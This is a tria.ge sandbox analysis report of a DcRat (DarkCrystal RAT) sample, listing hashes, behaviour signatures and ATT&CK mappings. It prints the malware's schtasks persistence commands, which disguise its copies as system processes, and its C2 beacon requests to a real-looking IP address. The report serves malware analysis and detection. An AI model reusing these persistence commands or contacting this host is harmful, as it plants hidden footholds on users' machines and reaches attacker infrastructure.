Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

1e1ee51c8a...7d.exe

windows7-x64

10

1e1ee51c8a...7d.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/12/2024, 20:29 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe

  • Size

    952KB

  • MD5

    95939c0925ece0edd3465ef067ca58c8

  • SHA1

    7c0f4691d4f60beb794a161834702623b610c2a6

  • SHA256

    1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d

  • SHA512

    b46684d36fc7be55fc83d84866fa91c8af85c19dc3f23922f6acf241e173dbfb173bda53d18bfc447f751315c004ea5dd06079a10d1a6acb70a354e98e5e9625

  • SSDEEP

    24576:u+O7F9smBDJwWmIezBLwsHuWbxR4AK5ZJXX:p8/KfRTK

Score
10/10
dcratevasioninfostealerpersistencerattrojan

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
    persistence
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 6 IoCs
    evasiontrojan
  • DCRat payload 7 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Drops file in System32 directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • System policy modification 1 TTPs 6 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe
    "C:\Users\Admin\AppData\Local\Temp\1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d.exe"
    1⤵
    • Modifies WinLogon for persistence
    • UAC bypass
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2388
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MhoiJDNFqU.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\system32\w32tm.exe
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3⤵
          PID:1516
        • C:\Windows\System32\wlangpui\lsm.exe
          "C:\Windows\System32\wlangpui\lsm.exe"
          3⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Suspicious use of AdjustPrivilegeToken
          • System policy modification
          PID:2216
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2752
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\Admin\wininit.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2928
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Documents and Settings\csrss.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2896
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\taskhost.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2768
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\System32\wlangpui\lsm.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2612
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\MdRes\dllhost.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2724

    Network

    • flag-ru
      GET
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      lsm.exe
      Remote address:
      37.230.117.59:80
      Request
      GET /imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9 HTTP/1.1
      Accept: */*
      Content-Type: text/javascript
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
      Host: 37.230.117.59
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 06 Dec 2024 20:29:55 GMT
      Server: Apache/2.4.25 (Debian)
      Content-Length: 275
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
    • flag-ru
      GET
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      lsm.exe
      Remote address:
      37.230.117.59:80
      Request
      GET /imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9 HTTP/1.1
      Accept: */*
      Content-Type: text/javascript
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
      Host: 37.230.117.59
      Response
      HTTP/1.1 404 Not Found
      Date: Fri, 06 Dec 2024 20:29:55 GMT
      Server: Apache/2.4.25 (Debian)
      Content-Length: 275
      Content-Type: text/html; charset=iso-8859-1
    • 37.230.117.59:80
      http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9
      http
      lsm.exe
      1.5kB
       1.1kB
       5
      4

      HTTP Request

      GET http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9

      HTTP Response

      404

      HTTP Request

      GET http://37.230.117.59/imageVmLongpolluniversal.php?AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9&3dfda1326f23fa458772de2e5dad5824=b7ab15875a4640475dcbbba6591b0c2a&feda21d96cfab96e4a2f4867c20389ba=wM1E2MzAzYxcjN4QWO1ETY2YzYiFGM5ETNjNWZhRWNhFTMyYDM1UDO&AMpx9JQsKKaCHUaR7qo0dHgEvNqOLJO=JpL0ZeaqIUzEKu&PYiCJjpf2pkBwdBhB5B3bJj1cQ8sI=b3ARb0mGEz&KSLzdoMGxxIJ1eGy=j3l7WkNqAeBL451LZR0YC9

      HTTP Response

      404
    No results found

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Winlogon Helper DLL

    1
    T1547.004

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Winlogon Helper DLL

    1
    T1547.004

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    4
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe
      Filesize

      952KB

      MD5

      a0188adcd3266031be0b2fa14721ec68

      SHA1

      3a257a2045d863d5f8c736f21ecf639ea90149ed

      SHA256

      49b8b3f175660a091a5f34a036d6ff6f1ca1b64d80ff4874c7082624f46ec84b

      SHA512

      99782e3b7ec9a7ab4c58fa8d96ba70d161aa68e4fccea7d841f82404468d690834c70c386dd33069615b3618b825a502324436d792cbd9aa01522c6ae821d3cf

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MhoiJDNFqU.bat
      Filesize

      200B

      MD5

      c0691dff372da41143fec1f5953cb2a7

      SHA1

      05644947e1ac1597c9d59c444e8f3ea2cd19864e

      SHA256

      bf6a6ecbf6e51721f1331d7fd34f33805d8614792facae2f885954120da38231

      SHA512

      7521cb2e20bd6a5ac5a032b9520962dbc67796737d2a013f83e8de82e69030b454581c3f948afbcaacffa7550c0d44eefc6d66476abb414e1702c3a575091c8d

      Download Submit

    • C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\taskhost.exe
      Filesize

      952KB

      MD5

      724676cd654194a3de063ea52502ef99

      SHA1

      c423b3bccf5568bade3180b2a869a2613ec4bad0

      SHA256

      2535e16dec497bcbd27100df14f9317fe149869ba8f5a334de4a75bad6c6c7f9

      SHA512

      c1e365a6ca98706cbcf8afe6c96530e5ad4de9c67bf7daf49363c506bdfda6a8096505d56286706c179bf8eaab747632857b1fa4ec41f52e7b86993d79b3bcd9

      Download Submit

    • C:\Users\csrss.exe
      Filesize

      952KB

      MD5

      c99ee76eb8073aecb0d87b34ec7a40a1

      SHA1

      3bc291d384d0289253cdfc3c9ed73f9650220b3b

      SHA256

      0933c3afa33b1450228f34073b0afdef63be1cc1514c442737b1b9bd4851db93

      SHA512

      06833ed18d047c5363be1d196807f6c6bc80badb14967e0d8196c3ba21581a658bff9217e5daad38a92a6c71ab81bb39436433ae849c0b934b66c1c19e9533dc

      Download Submit

    • C:\Windows\System32\wlangpui\lsm.exe
      Filesize

      952KB

      MD5

      95939c0925ece0edd3465ef067ca58c8

      SHA1

      7c0f4691d4f60beb794a161834702623b610c2a6

      SHA256

      1e1ee51c8a265b2b86b0c6aec30e8ba5c8a1ea69a2d47bbceff7813fc673ed7d

      SHA512

      b46684d36fc7be55fc83d84866fa91c8af85c19dc3f23922f6acf241e173dbfb173bda53d18bfc447f751315c004ea5dd06079a10d1a6acb70a354e98e5e9625

      Download Submit

    • C:\Windows\System32\wlangpui\lsm.exe
      Filesize

      952KB

      MD5

      0727fbe77deb1e4428a8ee05897264e6

      SHA1

      cff32a1a2a894d7bba710a17d4a1ed91ebf680e1

      SHA256

      320332087ffdf5ddbde31a961e2255e42940a6c1e6241508f75316b453d05cd6

      SHA512

      08785f08c9f6b907161609e550bc2b970fdffb6a0cbd3f91dfd7a57e8d6d86b49562eca648a4b9d424a9a14a7df8ce53d441949177a5ef14fe7d09df3ea6986a

      Download Submit

    • memory/2216-105-0x00000000002F0000-0x00000000003E4000-memory.dmp

      Filesize

      976KB

      Download

    • memory/2388-6-0x0000000000150000-0x000000000015C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/2388-10-0x0000000000500000-0x000000000050C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/2388-9-0x00000000002F0000-0x00000000002FA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2388-11-0x00000000002C0000-0x00000000002CC000-memory.dmp

      Filesize

      48KB

      Download

    • memory/2388-8-0x0000000000180000-0x0000000000188000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2388-4-0x0000000000160000-0x0000000000170000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2388-5-0x0000000000190000-0x000000000019A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2388-0-0x000007FEF5063000-0x000007FEF5064000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2388-7-0x0000000000170000-0x000000000017A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2388-3-0x0000000000140000-0x0000000000150000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2388-2-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2388-102-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2388-1-0x0000000000300000-0x00000000003F4000-memory.dmp

      Filesize

      976KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.